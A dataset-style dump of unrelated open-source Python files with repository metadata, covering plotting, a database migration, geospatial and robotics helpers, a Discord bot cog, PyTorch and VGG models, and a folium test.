0.1/aheight, right_label, horizontalalignment="center", verticalalignment='bottom', transform=ax.transAxes, family='monospace') # Save the vertical position so that we can place the # tick marks ticks.append(pos) # Loop over the points in one line for ji,jp in enumerate(lines_map[(k0,k1)]): # Calculate the vertical offset yo = 0 if stacked: yo = -dpos/5 + style_codes_map[styles[jp]]*stackd pt = points[jp] # Plot the interval if intervals is not None: # Symmetric interval if np.isscalar(intervals[jp]): lcb, ucb = pt - 
intervals[jp],\ pt + intervals[jp] # Nonsymmetric interval else: lcb, ucb = pt - intervals[jp][0],\ pt + intervals[jp][1] # Draw the interval if horizontal: ax.plot([lcb, ucb], [pos+yo, pos+yo], '-', transform=trans, **line_props[styles[jp]]) else: ax.plot([pos+yo, pos+yo], [lcb, ucb], '-', transform=trans, **line_props[styles[jp]]) # Plot the point sl = styles[jp] sll = sl if sl not in labeled else None labeled.add(sl) if horizontal: ax.plot([pt,], [pos+yo,], ls='None', transform=trans, label=sll, **marker_props[sl]) else: ax.plot([pos+yo,], [pt,], ls='None', transform=trans, label=sll, **marker_props[sl]) if horizontal: pos -= dpos else: pos += dpos # Set up the axis if horizontal: ax.xaxis.set_ticks_position("bottom") ax.yaxis.set_ticks_position("none") ax.set_yticklabels([]) ax.spines['left'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['bottom'].set_position(('axes', -0.1/aheight)) ax.set_ylim(0, 1) ax.yaxis.set_ticks(ticks) ax.autoscale_view(scaley=False, tight=True) else: ax.yaxis.set_ticks_position("left") ax.xaxis.set_ticks_position("none") ax.set_xticklabels([]) ax.spines['bottom'].set_color('none') ax.spines['right'].set_color('none') ax.spines['top'].set_color('none') ax.spines['left'].set_position(('axes', -0.1/awidth)) ax.set_xlim(0, 1) ax.xaxis.set_ticks(ticks) ax.autoscale_view(scalex=False, tight=True) return fig
0
0
0
70fe63fd252ad0c12abc04de082c33c848a23ee4
633
py
Python
agent/alembic/versions/746f77fcf519_create_pipeline_offset_table.py
eacherkan-aternity/daria
7c77a2f52c09c852017b16949a848fa51f0fb579
[ "Apache-2.0" ]
16
2019-04-03T08:31:54.000Z
2021-01-24T17:12:04.000Z
agent/alembic/versions/746f77fcf519_create_pipeline_offset_table.py
eacherkan-aternity/daria
7c77a2f52c09c852017b16949a848fa51f0fb579
[ "Apache-2.0" ]
10
2020-01-20T14:59:06.000Z
2022-01-21T10:19:16.000Z
agent/alembic/versions/746f77fcf519_create_pipeline_offset_table.py
eacherkan-aternity/daria
7c77a2f52c09c852017b16949a848fa51f0fb579
[ "Apache-2.0" ]
5
2021-01-08T19:23:03.000Z
2021-11-09T14:15:49.000Z
"""create_pipeline_offset_table Revision ID: 746f77fcf519 Revises: 63c90017aa5d Create Date: 2020-10-20 13:32:59.329693 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '746f77fcf519' down_revision = '63c90017aa5d' branch_labels = None depends_on = None
21.1
74
0.71564
"""create_pipeline_offset_table Revision ID: 746f77fcf519 Revises: 63c90017aa5d Create Date: 2020-10-20 13:32:59.329693 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '746f77fcf519' down_revision = '63c90017aa5d' branch_labels = None depends_on = None def upgrade(): op.create_table( 'pipeline_offsets', sa.Column('id', sa.Integer, autoincrement=True, primary_key=True), sa.Column('pipeline_id', sa.Integer, nullable=False), sa.Column('offset', sa.String, nullable=False) ) def downgrade(): op.drop_table('pipeline_offsets')
273
0
46
86ff824699222c69c36860f3f9d1fe253fde8c59
2,791
py
Python
python/src/main/python/pygw/geotools/simple_feature_type_builder.py
jhickman-prominent/geowave
fb421588e22a7c68ef13be1e57bc2c674dd1b090
[ "Apache-2.0" ]
null
null
null
python/src/main/python/pygw/geotools/simple_feature_type_builder.py
jhickman-prominent/geowave
fb421588e22a7c68ef13be1e57bc2c674dd1b090
[ "Apache-2.0" ]
2
2019-09-20T15:39:27.000Z
2019-12-03T14:07:43.000Z
python/src/main/python/pygw/geotools/simple_feature_type_builder.py
jhickman-prominent/geowave
fb421588e22a7c68ef13be1e57bc2c674dd1b090
[ "Apache-2.0" ]
null
null
null
# # Copyright (c) 2013-2019 Contributors to the Eclipse Foundation # # See the NOTICE file distributed with this work for additional information regarding copyright # ownership. All rights reserved. This program and the accompanying materials are made available # under the terms of the Apache License, Version 2.0 which accompanies this distribution and is # available at http://www.apache.org/licenses/LICENSE-2.0.txt #=============================================================================================== from pygw.config import java_pkg from pygw.base import GeoWaveObject from .simple_feature_type import SimpleFeatureType from .attribute_descriptor import AttributeDescriptor class SimpleFeatureTypeBuilder(GeoWaveObject): """ Builds `pygw.geotools.simple_feature_type.SimpleFeatureType` instances. """ def set_name(self, name): """ Sets the name of the feature type. Args: name (str): The name to use. Returns: This feature type builder. """ self._java_ref.setName(name) return self def set_namespace_uri(self, namespace_uri): """ Sets the namespace URI of the feature type. Args: namespace_uri (str): The namespace URI to use. Returns: This feature type builder. """ self._java_ref.setNamespaceURI(namespace_uri) return self def set_srs(self, srs): """ Sets the spatial reference system of the feature type. Args: srs (str): The spatial reference system to use. Returns: This feature type builder. """ self._java_ref.setSRS(srs) return self def add(self, attribute_descriptor): """ Adds an attribute to the feature type. Args: attribute_descriptor (pygw.geotools.attribute_descriptor.AttributeDescriptor): The attribute to add. Returns: This feature type builder. 
""" if isinstance(attribute_descriptor, AttributeDescriptor): self.attributes.append(attribute_descriptor) self._java_ref.add(attribute_descriptor._java_ref) return self else: raise ValueError("attribute_descriptor should be of type AttributeDescriptor") def build_feature_type(self): """ Builds the configured feature type. Returns: A `pygw.geotools.simple_feature_type.SimpleFeatureType` with the given configuration. """ return SimpleFeatureType(self._java_ref.buildFeatureType(), self.attributes)
32.835294
112
0.638839
# # Copyright (c) 2013-2019 Contributors to the Eclipse Foundation # # See the NOTICE file distributed with this work for additional information regarding copyright # ownership. All rights reserved. This program and the accompanying materials are made available # under the terms of the Apache License, Version 2.0 which accompanies this distribution and is # available at http://www.apache.org/licenses/LICENSE-2.0.txt #=============================================================================================== from pygw.config import java_pkg from pygw.base import GeoWaveObject from .simple_feature_type import SimpleFeatureType from .attribute_descriptor import AttributeDescriptor class SimpleFeatureTypeBuilder(GeoWaveObject): """ Builds `pygw.geotools.simple_feature_type.SimpleFeatureType` instances. """ def __init__(self): self.attributes = [] super().__init__(java_pkg.org.geotools.feature.simple.SimpleFeatureTypeBuilder()) def set_name(self, name): """ Sets the name of the feature type. Args: name (str): The name to use. Returns: This feature type builder. """ self._java_ref.setName(name) return self def set_namespace_uri(self, namespace_uri): """ Sets the namespace URI of the feature type. Args: namespace_uri (str): The namespace URI to use. Returns: This feature type builder. """ self._java_ref.setNamespaceURI(namespace_uri) return self def set_srs(self, srs): """ Sets the spatial reference system of the feature type. Args: srs (str): The spatial reference system to use. Returns: This feature type builder. """ self._java_ref.setSRS(srs) return self def add(self, attribute_descriptor): """ Adds an attribute to the feature type. Args: attribute_descriptor (pygw.geotools.attribute_descriptor.AttributeDescriptor): The attribute to add. Returns: This feature type builder. 
""" if isinstance(attribute_descriptor, AttributeDescriptor): self.attributes.append(attribute_descriptor) self._java_ref.add(attribute_descriptor._java_ref) return self else: raise ValueError("attribute_descriptor should be of type AttributeDescriptor") def build_feature_type(self): """ Builds the configured feature type. Returns: A `pygw.geotools.simple_feature_type.SimpleFeatureType` with the given configuration. """ return SimpleFeatureType(self._java_ref.buildFeatureType(), self.attributes)
117
0
27
263312b88cc0b035cd76732103e670965aa5d5b7
3,099
py
Python
robots/sc-3dof/src/sc_3dof_manipulate.py
frdedynamics/ik_solver_test
e162080838dca9cdba2c576836acd4a06563db3c
[ "RSA-MD" ]
null
null
null
robots/sc-3dof/src/sc_3dof_manipulate.py
frdedynamics/ik_solver_test
e162080838dca9cdba2c576836acd4a06563db3c
[ "RSA-MD" ]
null
null
null
robots/sc-3dof/src/sc_3dof_manipulate.py
frdedynamics/ik_solver_test
e162080838dca9cdba2c576836acd4a06563db3c
[ "RSA-MD" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- from openravepy import * import sys import numpy as np # initialize environment env = Environment() env.StopSimulation() # openrave_root = './' # env.Load(openrave_root + "baxter_ik.xml") env.Load("sc_3dof.xml") env.SetViewer('qtcoin') # start the viewer (conflicts with matplotlib) robot = env.GetRobots()[0] # get the first robot manip = robot.SetActiveManipulator('manipulator') # set the manipulator to right_arm dummy_joints = [1.57, 0.0, 0.0] robot.SetDOFValues(dummy_joints, manip.GetArmIndices()) # set the current solution current_pose = manip.GetEndEffectorTransform() print current_pose # # try IK for similar pose goal_pose = current_pose # # goal_pose[2,3] -= 0.05 ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) print ikmodel.load() # sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution # print "IK solution:", sol # ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) # if not ikmodel.load(): # ikmodel.autogenerate() index = 0 with env: # move the robot in a random collision-free position and call the IK while True: target=ikmodel.manip.GetTransform()[0:3,3]+(np.random.rand(3)-0.5) solutions = ikmodel.manip.FindIKSolutions(IkParameterization(target,IkParameterization.Type.Lookat3D),IkFilterOptions.CheckEnvCollisions) print "index:", index index += 1 if len(solutions) > 0: break raw_input('Hit ENTER to continue.') env.Destroy() with robot: # lock environment and save robot state robot.SetDOFValues([0.0, 0.0, 0.0],[0,1,2]) # set the first 3 dof values Tee = manip.GetEndEffectorTransform() # get end effector print Tee ikparam = IkParameterization(Tee[0:3,3],ikmodel.iktype) # build up the translation3d ik query print ikparam print ikparam.GetType() print ikparam.GetNumberOfValues() print ikparam.GetValues() print ikparam.GetDOF() print ikparam.GetRotation3D() print 
ikparam.GetTranslation3D() # joint_conf = databases.inversekinematics.RaveCreateIkSolver(env, 'sc_3dof') # print "joint_conf", joint_conf ikmodel = databases.inversekinematics.InverseKinematicsModel(robot, iktype=IkParameterization.Type.Translation3D) ikname = ikmodel.getikname() iktest = ikmodel.testik() print "ikname", ikname sys.exit("Done") sols = manip.FindIKSolutions(ikparam, IkFilterOptions.CheckEnvCollisions) # get all solutions sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution print sols sys.exit("Done") h = env.plot3(Tee[0:3,3],10) # plot one point with robot: # save robot state for sol in sols[::10]: # go through every 10th solution robot.SetDOFValues(sol,manip.GetArmIndices()) # set the current solution env.UpdatePublishedBodies() # allow viewer to update new robot raw_input('press any key') raveLogInfo('restored dof values: '+repr(robot.GetDOFValues())) # robot state is restored to original
34.054945
141
0.734108
#!/usr/bin/env python # -*- coding: utf-8 -*- from openravepy import * import sys import numpy as np # initialize environment env = Environment() env.StopSimulation() # openrave_root = './' # env.Load(openrave_root + "baxter_ik.xml") env.Load("sc_3dof.xml") env.SetViewer('qtcoin') # start the viewer (conflicts with matplotlib) robot = env.GetRobots()[0] # get the first robot manip = robot.SetActiveManipulator('manipulator') # set the manipulator to right_arm dummy_joints = [1.57, 0.0, 0.0] robot.SetDOFValues(dummy_joints, manip.GetArmIndices()) # set the current solution current_pose = manip.GetEndEffectorTransform() print current_pose # # try IK for similar pose goal_pose = current_pose # # goal_pose[2,3] -= 0.05 ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) print ikmodel.load() # sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution # print "IK solution:", sol # ikmodel = databases.inversekinematics.InverseKinematicsModel(robot,iktype=IkParameterization.Type.Translation3D) # if not ikmodel.load(): # ikmodel.autogenerate() index = 0 with env: # move the robot in a random collision-free position and call the IK while True: target=ikmodel.manip.GetTransform()[0:3,3]+(np.random.rand(3)-0.5) solutions = ikmodel.manip.FindIKSolutions(IkParameterization(target,IkParameterization.Type.Lookat3D),IkFilterOptions.CheckEnvCollisions) print "index:", index index += 1 if len(solutions) > 0: break raw_input('Hit ENTER to continue.') env.Destroy() with robot: # lock environment and save robot state robot.SetDOFValues([0.0, 0.0, 0.0],[0,1,2]) # set the first 3 dof values Tee = manip.GetEndEffectorTransform() # get end effector print Tee ikparam = IkParameterization(Tee[0:3,3],ikmodel.iktype) # build up the translation3d ik query print ikparam print ikparam.GetType() print ikparam.GetNumberOfValues() print ikparam.GetValues() print ikparam.GetDOF() print ikparam.GetRotation3D() print 
ikparam.GetTranslation3D() # joint_conf = databases.inversekinematics.RaveCreateIkSolver(env, 'sc_3dof') # print "joint_conf", joint_conf ikmodel = databases.inversekinematics.InverseKinematicsModel(robot, iktype=IkParameterization.Type.Translation3D) ikname = ikmodel.getikname() iktest = ikmodel.testik() print "ikname", ikname sys.exit("Done") sols = manip.FindIKSolutions(ikparam, IkFilterOptions.CheckEnvCollisions) # get all solutions sol = manip.FindIKSolution(goal_pose, 18) # get collision-free solution print sols sys.exit("Done") h = env.plot3(Tee[0:3,3],10) # plot one point with robot: # save robot state for sol in sols[::10]: # go through every 10th solution robot.SetDOFValues(sol,manip.GetArmIndices()) # set the current solution env.UpdatePublishedBodies() # allow viewer to update new robot raw_input('press any key') raveLogInfo('restored dof values: '+repr(robot.GetDOFValues())) # robot state is restored to original
0
0
0
e7d0c8fc9a6524561313e97fa779be7c5c6960c4
5,826
py
Python
bot/player_commands/missing.py
UP929312/CommunityBot
c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a
[ "Apache-2.0" ]
1
2021-06-15T07:31:13.000Z
2021-06-15T07:31:13.000Z
bot/player_commands/missing.py
UP929312/CommunityBot
c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a
[ "Apache-2.0" ]
1
2021-06-01T10:14:32.000Z
2021-06-02T10:54:12.000Z
bot/player_commands/missing.py
UP929312/CommunityBot
c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a
[ "Apache-2.0" ]
2
2021-06-01T10:59:15.000Z
2021-06-03T18:29:36.000Z
import discord # type: ignore from discord.ext import commands # type: ignore from discord.commands import Option # type: ignore from typing import Optional import json import requests from utils import error, PROFILE_NAMES, hf, guild_ids from menus import generate_static_preset_menu from emojis import ITEM_RARITY from parse_profile import get_profile_data from extract_ids import extract_internal_names RARITY_LIST = list(ITEM_RARITY.keys()) # Create the master list! from text_files.accessory_list import talisman_upgrades # Get a list of all accessories ACCESSORIES: list[dict] = [] with open("text_files/MASTER_ITEM_DICT.json", "r", encoding="utf-8") as file: item_dict = json.load(file) for item in item_dict: if item_dict[item].get("rarity", False) and item_dict[item]["rarity"] != "UNKNOWN": ACCESSORIES.append(item_dict[item]) # Now remove all the low tier ones MASTER_ACCESSORIES = [] for accessory in ACCESSORIES: if accessory["internal_name"] not in talisman_upgrades.keys(): MASTER_ACCESSORIES.append(accessory) EMOJI_LIST = ["<:alphabetically:905066318720544779>", "<:recombobulator:854750106376339477>", "<:by_price:900069290143797299>"]
50.66087
166
0.650704
import discord # type: ignore from discord.ext import commands # type: ignore from discord.commands import Option # type: ignore from typing import Optional import json import requests from utils import error, PROFILE_NAMES, hf, guild_ids from menus import generate_static_preset_menu from emojis import ITEM_RARITY from parse_profile import get_profile_data from extract_ids import extract_internal_names RARITY_LIST = list(ITEM_RARITY.keys()) # Create the master list! from text_files.accessory_list import talisman_upgrades # Get a list of all accessories ACCESSORIES: list[dict] = [] with open("text_files/MASTER_ITEM_DICT.json", "r", encoding="utf-8") as file: item_dict = json.load(file) for item in item_dict: if item_dict[item].get("rarity", False) and item_dict[item]["rarity"] != "UNKNOWN": ACCESSORIES.append(item_dict[item]) # Now remove all the low tier ones MASTER_ACCESSORIES = [] for accessory in ACCESSORIES: if accessory["internal_name"] not in talisman_upgrades.keys(): MASTER_ACCESSORIES.append(accessory) EMOJI_LIST = ["<:alphabetically:905066318720544779>", "<:recombobulator:854750106376339477>", "<:by_price:900069290143797299>"] class missing_cog(commands.Cog): def __init__(self, bot) -> None: self.client = bot @commands.command(name="missing", aliases=['missing_accessories', 'accessories', 'miss', 'm']) async def missing_command(self, ctx, provided_username: Optional[str] = None, provided_profile: Optional[str] = None) -> None: await self.get_missing(ctx, provided_username, provided_profile, is_response=False) @commands.slash_command(name="missing", description="Gets someone's missing accessories", guild_ids=guild_ids) async def missing_slash(self, ctx, username: Option(str, "username:", required=False), profile: Option(str, "profile", choices=PROFILE_NAMES, required=False)): if not (ctx.channel.permissions_for(ctx.guild.me)).send_messages: return await ctx.respond("You're not allowed to do that here.", ephemeral=True) await self.get_missing(ctx, username, 
profile, is_response=True) #========================================================================================================================================= async def get_missing(self, ctx, provided_username: Optional[str] = None, provided_profile_name: Optional[str] = None, is_response: bool = False) -> None: player_data: Optional[dict] = await get_profile_data(ctx, provided_username, provided_profile_name, is_response=is_response) if player_data is None: return username = player_data["username"] accessory_bag = player_data.get("talisman_bag", None) inv_content = player_data.get("inv_contents", {"data": []}) if not accessory_bag: return await error(ctx, "Error, could not find this person's accessory bag", "Do they have their API disabled for this command?", is_response=is_response) accessory_bag = extract_internal_names(accessory_bag["data"]) inventory = extract_internal_names(inv_content["data"]) missing = [x for x in MASTER_ACCESSORIES if x["internal_name"] not in accessory_bag+inventory] if not missing: return await error(ctx, f"Completion!", f"{username} already has all accessories!", is_response=is_response) try: lowest_bin_data = requests.get("http://moulberry.codes/lowestbin.json").json() except: return await error(ctx, f"Error, price API is down!", f"Please wait for it to return, and try again later!", is_response=is_response) for accessory in missing: accessory["price"] = lowest_bin_data.get(accessory["internal_name"], 9999999999) list_of_embeds = [] for page, parameter in zip(["alphabetically", "by rarity", "by price"], ["name", "rarity", "price"]): sort_func = lambda x: x[parameter] if parameter != "rarity" else RARITY_LIST.index(x["rarity"]) sorted_accessories = sorted(missing, key=sort_func)[:42] extra = "" if len(missing) <= 36 else f", showing the first {int(len(sorted_accessories)/6)}" embed = discord.Embed(title=f"Missing {len(missing)} accessories for {username}{extra}, sorted: {page}", colour=0x3498DB) def make_embed(embed, acc_list, 
num): text = "" for item in acc_list: wiki_link = "<Unknown>" if not item['wiki_link'] else f"[wiki]({item['wiki_link']})" price = hf(item['price']) if item['price'] != 9999999999 else 'N/A' text += f"{ITEM_RARITY[item['rarity']]} {item['name']}\n➜ For {price}, link: {wiki_link}\n" embed_title = f"{acc_list[0]['name'][0]}-{acc_list[-1]['name'][0]}" if parameter == "name" else f"Group {num}" embed.add_field(name=f"{embed_title}", value=text, inline=True) if len(sorted_accessories) < 6: # For people with only a few missing make_embed(embed, sorted_accessories, 1) else: list_length = int(len(sorted_accessories)/6) for row in range(6): row_accessories = sorted_accessories[row*list_length:(row+1)*list_length] # Get the first group out of 6 make_embed(embed, row_accessories, row+1) embed.set_footer(text=f"Command executed by {ctx.author.display_name} | Community Bot. By the community, for the community.") list_of_embeds.append(embed) await generate_static_preset_menu(ctx=ctx, list_of_embeds=list_of_embeds, emoji_list=EMOJI_LIST, is_response=is_response)
4,116
484
23
8f765cb99284c504f466ca30e7deb4f59c374dad
3,797
py
Python
model/MyModel.py
seanzhangJM/torch_nlp_job_default
fe9126c4abbde441fcc65d14d42477e4fff9d509
[ "MIT" ]
null
null
null
model/MyModel.py
seanzhangJM/torch_nlp_job_default
fe9126c4abbde441fcc65d14d42477e4fff9d509
[ "MIT" ]
null
null
null
model/MyModel.py
seanzhangJM/torch_nlp_job_default
fe9126c4abbde441fcc65d14d42477e4fff9d509
[ "MIT" ]
null
null
null
#!/usr/bin/env python # _*_ coding: utf-8 _*_ # @Time : 2021/12/27 14:03 # @Author : zhangjianming # @Email : YYDSPanda@163.com # @File : MyModel.py # @Software: PyCharm import torch import torch.nn as nn import torch.nn.functional as F from torch_nlp_job_default.util.log_config import get_logger logger = get_logger() class RNNModel(nn.Module): """循环神经网络模型"""
37.97
114
0.628654
#!/usr/bin/env python # _*_ coding: utf-8 _*_ # @Time : 2021/12/27 14:03 # @Author : zhangjianming # @Email : YYDSPanda@163.com # @File : MyModel.py # @Software: PyCharm import torch import torch.nn as nn import torch.nn.functional as F from torch_nlp_job_default.util.log_config import get_logger logger = get_logger() class RNNModel(nn.Module): """循环神经网络模型""" def __init__(self, rnn_layer, vocab_size, **kwargs): super(RNNModel, self).__init__(**kwargs) self.rnn = rnn_layer self.vocab_size = vocab_size self.num_hiddens = self.rnn.hidden_size # 如果RNN是双向的(之后将介绍),num_directions应该是2,否则应该是1 if not self.rnn.bidirectional: self.num_directions = 1 self.linear = nn.Linear(self.num_hiddens, self.vocab_size) else: self.num_directions = 2 self.linear = nn.Linear(self.num_hiddens * 2, self.vocab_size) def forward(self, inputs, state): # nn.Embedding X = F.one_hot(inputs.T.long(), self.vocab_size) X = X.to(torch.float32) Y, state = self.rnn(X, state) # 全连接层首先将Y的形状改为(时间步数*批量大小,隐藏单元数) # 它的输出形状是(时间步数*批量大小,词表大小)。 output = self.linear(Y.reshape((-1, Y.shape[-1]))) return output, state def begin_state(self, device, batch_size=1): if not isinstance(self.rnn, nn.LSTM): # nn.GRU以张量作为隐状态 return torch.zeros((self.num_directions * self.rnn.num_layers, batch_size, self.num_hiddens), device=device) else: # nn.LSTM以元组作为隐状态 return (torch.zeros(( self.num_directions * self.rnn.num_layers, batch_size, self.num_hiddens), device=device), torch.zeros(( self.num_directions * self.rnn.num_layers, batch_size, self.num_hiddens), device=device)) class Seq2SeqEncoder(nn.Module): def __init__(self, vocab_size, embed_size, num_hiddens, num_layers, dropout=0, **kwargs): super(Seq2SeqEncoder, self).__init__(**kwargs) self.vocab_size = vocab_size self.embed_size = embed_size self.num_hiddens = num_hiddens self.embedding = nn.Embedding(self.vocab_size, self.embed_size) self.rnn = nn.GRU(embed_size, num_hiddens, num_layers=num_layers, dropout=dropout) def forward(self, X): # X 
shape:[batch_size,time_steps,embed_size] X = self.embedding(X) X = X.permute(1, 0, 2) output, state = self.rnn(X) # output:[time_steps,batch_size,num_hiddens] # state[0]:[2*num_layers,batch_size,num_hiddens] if bidirectional else [num_layers,batch_size,num_hiddens] return output, state class Seq2SeqDecoder(nn.Module): def __init__(self, vocab_size, embed_size, num_hiddens, num_layers, dropout=0, **kwargs): super(Seq2SeqDecoder, self).__init__(**kwargs) self.vocab_size = vocab_size self.embed_size = embed_size self.num_hiddens = num_hiddens self.embedding = nn.Embedding(self.vocab_size, self.embed_size) self.rnn = nn.GRU(embed_size + num_hiddens, num_hiddens, num_layers=num_layers, dropout=dropout) self.dense = nn.Linear(num_hiddens, vocab_size) def init_state(self, enc_outputs, *args): return enc_outputs[1] def forward(self, X, state): X = self.embedding(X) X = X.permute(1, 0, 2) context = state[-1].repeat(X.shape[0], 1, 1) X_and_context = torch.cat((X, context), dim=2) output, state = self.rnn(X_and_context, state) # output shape:[time_steps,batch_size,num_hiddens] output = self.dense(output).permute(1, 0, 2) return output, state
3,302
22
260
7f96ffe28e1306cbb636608c457e89fc1dd8aeb0
1,679
py
Python
molsysmt/_private/exceptions/not_implemented_engine_error.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/_private/exceptions/not_implemented_engine_error.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
molsysmt/_private/exceptions/not_implemented_engine_error.py
uibcdf/MolModMTs
4f6b6f671a9fa3e73008d1e9c48686d5f20a6573
[ "MIT" ]
null
null
null
class NotImplementedEngineError(NotImplementedError): """Exception raised when executing a method with a specific engine is not supported yet. This exception is raised when a method can not be executed with the selected engine by the user. Parameters ---------- engine : str The engine not supported yet. Raises ------ NotImplementedFormError A message is printed out with the name of the engine not supported, the name of the class or the method raising the exception, the link to the API documentation, and the link to the issues board of Sabueso's GitHub repository. Examples -------- >>> from molsysmt._private.exceptions import NotImplementedEngineError >>> def method_name(engine): ... if engine not in ['MolSysMT', 'MDTraj']: ... raise NotImplementedEngineError(engine) ... pass .. admonition:: See Also :class: attention :ref:`Developer Guide \> Exceptions \> NotImplementedEngineError <developer:exceptions:NotImplementedEngineError>` """
31.092593
122
0.646814
class NotImplementedEngineError(NotImplementedError): """Exception raised when executing a method with a specific engine is not supported yet. This exception is raised when a method can not be executed with the selected engine by the user. Parameters ---------- engine : str The engine not supported yet. Raises ------ NotImplementedFormError A message is printed out with the name of the engine not supported, the name of the class or the method raising the exception, the link to the API documentation, and the link to the issues board of Sabueso's GitHub repository. Examples -------- >>> from molsysmt._private.exceptions import NotImplementedEngineError >>> def method_name(engine): ... if engine not in ['MolSysMT', 'MDTraj']: ... raise NotImplementedEngineError(engine) ... pass .. admonition:: See Also :class: attention :ref:`Developer Guide \> Exceptions \> NotImplementedEngineError <developer:exceptions:NotImplementedEngineError>` """ def __init__(self, syntaxis): from molsysmt import __github_issues_web__ from inspect import stack all_stack_frames = stack() caller_stack_frame = all_stack_frames[1] caller_name = caller_stack_frame[3] api_doc = '' message = ( f"The \"{engine}\" engine in \"{caller_name}\" has not been implemented yet. " f"Check {api_doc} for more information. " f"Write a new issue in {__github_issues_web__} asking for its implementation." ) super().__init__(message)
567
0
27
b9ba88b9235ace559185b77c2db576c890cd1f1b
1,783
py
Python
tests/plugins/test_beautify_icon.py
enricorotundo/folium
c3d21e6a90fbb21dff0a8b0851a835515b156eb8
[ "MIT" ]
10
2019-09-09T15:53:39.000Z
2022-01-15T19:35:41.000Z
tests/plugins/test_beautify_icon.py
enricorotundo/folium
c3d21e6a90fbb21dff0a8b0851a835515b156eb8
[ "MIT" ]
1
2018-10-26T14:07:53.000Z
2018-10-26T14:07:53.000Z
tests/plugins/test_beautify_icon.py
enricorotundo/folium
c3d21e6a90fbb21dff0a8b0851a835515b156eb8
[ "MIT" ]
1
2020-08-03T08:46:26.000Z
2020-08-03T08:46:26.000Z
# -*- coding: utf-8 -*- """ Test BeautifyIcon --------------- """ from __future__ import (absolute_import, division, print_function) from jinja2 import Template import folium from folium import plugins
29.229508
140
0.588334
# -*- coding: utf-8 -*- """ Test BeautifyIcon --------------- """ from __future__ import (absolute_import, division, print_function) from jinja2 import Template import folium from folium import plugins def test_beautify_icon(): m = folium.Map([30., 0.], zoom_start=3) # BeautifyIcons ic1 = plugins.BeautifyIcon( icon='plane', border_color='#b3334f', text_color='#b3334f') ic2 = plugins.BeautifyIcon(border_color='#00ABDC', text_color='#00ABDC', number=10, inner_icon_style='margin-top:0;') # Markers, add icons as keyword argument bm1 = folium.Marker(location=[46, -122], popup='Portland, OR', icon=ic1 ).add_to(m) bm2 = folium.Marker( location=[50, -121], icon=ic2 ).add_to(m) m.add_child(bm1) m.add_child(bm2) m._repr_html_() out = m._parent.render() # We verify that the script import is present. script = '<script src="https://cdn.rawgit.com/marslan390/BeautifyMarker/master/leaflet-beautify-marker-icon.js"></script>' # noqa assert script in out # We verify that the css import is present. css = '<link rel="stylesheet" href="https://cdn.rawgit.com/marslan390/BeautifyMarker/master/leaflet-beautify-marker-icon.css"/>' # noqa assert css in out # We verify that the Beautiful Icons are rendered correctly. tmpl = Template(u""" var {{this.get_name()}} = new L.BeautifyIcon.icon({{ this.options }}) {{this._parent.get_name()}}.setIcon({{this.get_name()}}); """) # noqa assert tmpl.render(this=ic1) in out assert tmpl.render(this=ic2) in out
1,551
0
23
a8f874247ca4e35e657f742398b5bb62716b1a49
1,661
py
Python
models/vgg.py
wangren09/ASK
f4b0f47341a1f2e3fd2a2c20898779fb589c29c5
[ "MIT" ]
54
2021-08-11T08:59:52.000Z
2021-09-29T17:35:53.000Z
models/vgg.py
wangren09/ASK
f4b0f47341a1f2e3fd2a2c20898779fb589c29c5
[ "MIT" ]
null
null
null
models/vgg.py
wangren09/ASK
f4b0f47341a1f2e3fd2a2c20898779fb589c29c5
[ "MIT" ]
13
2021-08-11T23:50:15.000Z
2022-02-27T18:04:08.000Z
import torch.nn as nn
32.568627
86
0.509332
import torch.nn as nn class VGG16(nn.Module): def __init__(self): super(VGG16, self).__init__() cfg1 = [64, 64, 'M'] cfg2 = [128, 128, 'M'] cfg3 = [256, 256, 256, 'M'] cfg4 = [512, 512, 512, 'M'] cfg5 = [512, 512, 512, 'M'] self.layer1 = self._make_layers(cfg1, 3) self.layer2 = self._make_layers(cfg2, 64) self.layer3 = self._make_layers(cfg3, 128) self.layer4 = self._make_layers(cfg4, 256) self.layer5 = self._make_layers(cfg5, 512) self.classifier = nn.Sequential( nn.Flatten(start_dim=1), nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Linear(512, 10), ) def _make_layers(self, cfg, in_channels): layers = [] for x in cfg: if x == 'M': layers += [nn.MaxPool2d(kernel_size=2, stride=2)] else: layers += [nn.Conv2d(in_channels, x, kernel_size=3, padding=1), nn.BatchNorm2d(x), nn.ReLU(inplace=True)] in_channels = x return nn.Sequential(*layers) def forward(self, x, extra_out=None): out1 = self.layer1(x) out2 = self.layer2(out1) out3 = self.layer3(out2) out4 = self.layer4(out3) out5 = self.layer5(out4) out = self.classifier(out5) if extra_out is None: return out else: return [out1, out2, out3, out4, out5][extra_out].flatten(start_dim=1), out
1,533
2
103
1509e1c5188bd7290ad8c4d58170e67abd20cdbe
10,235
py
Python
landsat8/core.py
paddyesch/landsat8
9e5736eed73ad7932c27077220362c6dac70be35
[ "MIT" ]
1
2016-11-24T10:42:57.000Z
2016-11-24T10:42:57.000Z
landsat8/core.py
paddyesch/landsat8
9e5736eed73ad7932c27077220362c6dac70be35
[ "MIT" ]
null
null
null
landsat8/core.py
paddyesch/landsat8
9e5736eed73ad7932c27077220362c6dac70be35
[ "MIT" ]
null
null
null
